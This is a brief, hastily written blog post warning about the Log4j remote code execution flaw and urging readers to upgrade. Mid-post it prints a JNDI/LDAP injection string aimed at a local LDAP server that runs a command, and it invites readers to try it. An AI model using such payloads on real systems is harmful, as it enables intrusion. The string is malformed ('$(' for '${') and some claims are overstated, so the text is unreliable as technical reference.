Java is a programming language that is not only used in apps like Steam and Spotify but is also in detrimental systems from companies like Amazon, Microsoft, Cloudflare, and more.
The new vulnerability affects the widely used library Log4j which was created by apache. The Log4j vulnerability allows remote code execution by simply typing a specific string into a textbox. It was first discovered by Minecraft players but soon after it was realized that this vulnerability wasn’t just a Minecraft exploit, It works on every program using the Log4j library.
To explain how easy this remote code execution hack is to perform try inputting this into a java app running log4j
$(jndi:ldap://127.0.0.1:1389/Basic/Command/start www.google.com)
Fortunately, this bug doesn’t affect all versions of Log4j it only affects the versions between 2.0 and 2.14.1 so if you have anything running that then switch versions now.
This is one of the worst vulnerabilities we have had in the last 10 years and this is just a very simple surface-level article if you are running Log4j I would recommend temporarily shutting down your application and looking deeper into how to fix the vulnerability. If you liked this article then please leave a like and feel free to leave feedback in the responses, it’s really appreciated. I wrote this article in a rush because I think it’s important to get this out to as many people as possible so there may be some errors.